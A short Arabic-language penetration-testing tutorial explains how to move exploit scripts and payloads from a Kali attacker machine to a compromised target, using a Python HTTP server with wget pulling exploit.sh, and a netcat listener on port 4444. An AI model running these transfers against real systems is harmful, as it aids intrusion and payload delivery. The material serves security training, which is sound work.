نقل الأدوات والـ Payloads
بعد الحصول على shell، غالباً ما تحتاج إلى نقل سكربتات استغلال مخصصة، أو أدوات تعداد، أو payloads كبيرة من جهاز Kali الخاص بك إلى الهدف.
1. استخدام خادم HTTP الخاص بـ Python
هذه هي الطريقة الأسرع والأسهل إذا كان بإمكان الهدف الوصول إلى جهازك عبر منفذ HTTP قياسي (80 أو 8080).
على Kali (المهاجم): انتقل إلى المجلد الذي يحتوي على الملف، وشغل:
bash python3 -m http.server 8080
على الهدف (الضحية): استخدم أداة مثل curl أو wget لتحميل الملف:
bash wget http://192.168.1.10:8080/exploit.sh
2. استخدام Netcat (ناقل الملفات الشامل)
يمكن استخدام Netcat لنقل البيانات مباشرة عبر سوكت (socket) الشبكة، بغض النظر عن قيود HTTP/FTP.
على Kali (المستمع): bash cat file_to_send | nc -lvnp 4444
على الضحية (المستقبل): bash nc 192.168.1.10 4444 > received_file